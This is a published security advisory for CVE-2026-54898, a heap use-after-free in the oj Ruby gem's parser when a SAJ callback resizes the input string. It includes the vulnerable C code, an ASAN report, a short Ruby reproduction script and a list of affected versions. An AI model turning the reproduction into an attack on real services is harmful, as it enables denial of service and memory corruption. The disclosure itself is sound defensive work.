GHSA-q2gm-54r6-8fwm

Source

https://github.com/advisories/GHSA-q2gm-54r6-8fwm

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-q2gm-54r6-8fwm/GHSA-q2gm-54r6-8fwm.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-q2gm-54r6-8fwm

Aliases

CVE-2026-54898

Published

2026-06-19T19:36:54Z

Modified

2026-06-19T19:45:53.245647415Z

Severity

8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N CVSS Calculator

Summary

Oj: Use-After-Free in Oj::Parser SAJ Callback via Input Mutation

Details

Summary

Oj::Parser#parse is vulnerable to a heap use-after-free when a SAJ/SAJ2 callback mutates the input JSON string during parsing. The C engine holds a raw const byte * pointer into the Ruby string's internal buffer. If a callback (e.g. hash_start) resizes the string — for example by calling String#replace with a longer value — Ruby reallocates the string buffer and frees the old one. The C parser's pointer is left dangling; the next character read at parser.c:607 is a use-after-free.

Version

Software: oj gem
Affected: all versions with ext/oj/parser.c
Latest tested: 3.17.1 (confirmed present)

Details

ext/oj/parser.c, parser_parse → parse:

static VALUE parser_parse(VALUE self, VALUE json) {
    const byte *ptr = (const byte *)StringValuePtr(json);  // raw pointer into Ruby string
    // ...
    parse(p, ptr);   // ptr used throughout; any realloc frees the backing buffer
}

// parser.c:607
static void parse(ojParser p, const byte *json) {
    const byte *b = json;
    // ...
    for (; '\0' != *b; b++) {   // ← UAF: reads freed memory after callback resizes json

Ruby's String#replace (or <<, gsub!, etc.) can trigger a reallocation of the string's internal buffer if the new content is larger than the embedded capacity, freeing the old buffer that ptr still points to.

ASAN report:

==372273==ERROR: AddressSanitizer: heap-use-after-free on address 0x51900008ed81
READ of size 1 at 0x51900008ed81 thread T0
    #0 parse          /ext/oj/parser.c:607
    #1 parser_parse   /ext/oj/parser.c:1408
0x51900008ed81 is located 1 bytes inside of 1023-byte region [0x51900008ed80, 0x51900008f17f)
freed by thread T0 here:
    #0 free
    #1 ruby_sized_xfree  (libruby-3.3.so.3.3)
Shadow bytes: [fd]fd fd fd fd fd ...  (entire region freed)

Reproduce

require 'oj'

class Mutator
  def initialize(json) = (@json = json; @done = false)

  def hash_start(key)
    return if @done; @done = true
    @json.replace('x' * 1_000_000)   # triggers String realloc, frees original buffer
  end

  def hash_end(key); end
  def array_start(key); end
  def array_end(key); end
  def add_value(value, key); end
end

json = '{"a":1,"pad":"' + ('A' * 1000) + '","z":2}'
parser = Oj::Parser.new(:saj)
parser.handler = Mutator.new(json)
parser.parse(json)

Database specific

{
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T19:36:54Z",
    "nvd_published_at": null,
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-416"
    ]
}

References

Affected packages

RubyGems / oj

Package

Name: oj
Purl: pkg:gem/oj

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

3.17.3

Affected versions

0.*

0.5

0.5.1

0.5.2

0.6.0

0.7.0

0.8.0

0.9.0

1.*

1.0.0

1.0.1

1.0.2

1.0.3

1.0.4

1.0.5

1.0.6

1.1.0

1.1.1

1.2.0

1.2.1

1.2.2

1.2.3

1.2.4

1.2.5

1.2.6

1.2.7

1.2.8

1.2.9

1.2.10

1.2.11

1.2.12

1.2.13

1.3.0

1.3.2

1.3.4

1.3.5

1.3.6

1.3.7

1.4.0

1.4.1

1.4.2

1.4.3

1.4.4

1.4.5

1.4.6a2

1.4.6

1.4.7

2.*

2.0.0

2.0.1

2.0.2

2.0.3

2.0.4

2.0.5

2.0.6

2.0.7

2.0.8

2.0.9

2.0.10

2.0.11

2.0.12

2.0.13

2.0.14

2.1.0

2.1.1

2.1.2

2.1.3

2.1.4

2.1.6

2.1.7

2.2.0

2.2.1

2.2.2

2.2.3

2.3.0

2.4.0

2.4.1

2.4.2

2.4.3

2.5.1

2.5.2

2.5.3

2.5.4

2.5.5

2.6.0

2.6.1

2.7.0

2.7.1

2.7.2

2.7.3

2.8.0

2.8.1

2.9.0

2.9.1

2.9.2

2.9.3

2.9.4

2.9.5

2.9.6

2.9.7

2.9.8

2.9.9

2.10.0

2.10.1

2.10.2

2.10.3

2.10.4

2.11.0

2.11.1

2.11.2

2.11.3

2.11.4

2.11.5

2.12.0

2.12.1

2.12.2

2.12.3

2.12.4

2.12.5

2.12.6

2.12.7

2.12.8

2.12.9

2.12.10

2.12.11

2.12.12

2.12.13

2.12.14

2.13.0

2.13.1

2.14.0

2.14.1

2.14.2

2.14.3

2.14.4

2.14.5

2.14.6

2.15.0

2.15.1

2.16.0

2.16.1

2.17.0

2.17.1

2.17.2

2.17.3

2.17.4

2.17.5

2.18.0

2.18.1

2.18.2

2.18.3

2.18.4

2.18.5

3.*

3.0.0

3.0.1

3.0.2

3.0.3

3.0.4

3.0.5

3.0.6

3.0.7

3.0.8

3.0.9

3.0.10

3.0.11

3.1.0

3.1.2

3.1.3

3.1.4

3.2.0

3.2.1

3.3.0

3.3.1

3.3.2

3.3.3

3.3.4

3.3.5

3.3.6

3.3.7

3.3.8

3.3.9

3.3.10

3.4.0

3.5.0

3.5.1

3.6.0

3.6.2

3.6.3

3.6.4

3.6.5

3.6.6

3.6.7

3.6.8

3.6.9

3.6.10

3.6.11

3.6.12

3.6.13

3.7.0

3.7.1

3.7.2

3.7.3

3.7.4

3.7.5

3.7.6

3.7.7

3.7.8

3.7.9

3.7.10

3.7.11

3.7.12

3.8.0

3.8.1

3.9.0

3.9.1

3.9.2

3.10.0

3.10.1

3.10.2

3.10.3

3.10.5

3.10.6

3.10.7

3.10.8

3.10.9

3.10.10

3.10.11

3.10.12

3.10.13

3.10.14

3.10.15

3.10.16

3.10.17

3.10.18

3.11.0

3.11.1

3.11.2

3.11.3

3.11.4

3.11.5

3.11.6

3.11.7

3.11.8

3.12.0

3.12.1

3.12.2

3.12.3

3.13.0

3.13.1

3.13.2

3.13.3

3.13.4

3.13.5

3.13.6

3.13.7

3.13.8

3.13.9

3.13.10

3.13.11

3.13.12

3.13.13

3.13.14

3.13.15

3.13.16

3.13.17

3.13.18

3.13.19

3.13.20

3.13.21

3.13.22

3.13.23

3.14.0

3.14.1

3.14.2

3.14.3

3.15.0

3.15.1

3.16.0

3.16.1

3.16.2

3.16.3

3.16.4

3.16.5

3.16.6

3.16.7

3.16.8

3.16.9

3.16.10

3.16.11

3.16.12

3.16.13

3.16.14

3.16.15

3.16.16

3.16.17

3.17.0

3.17.1

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-q2gm-54r6-8fwm/GHSA-q2gm-54r6-8fwm.json"

last_known_affected_version_range

"< 3.17.2"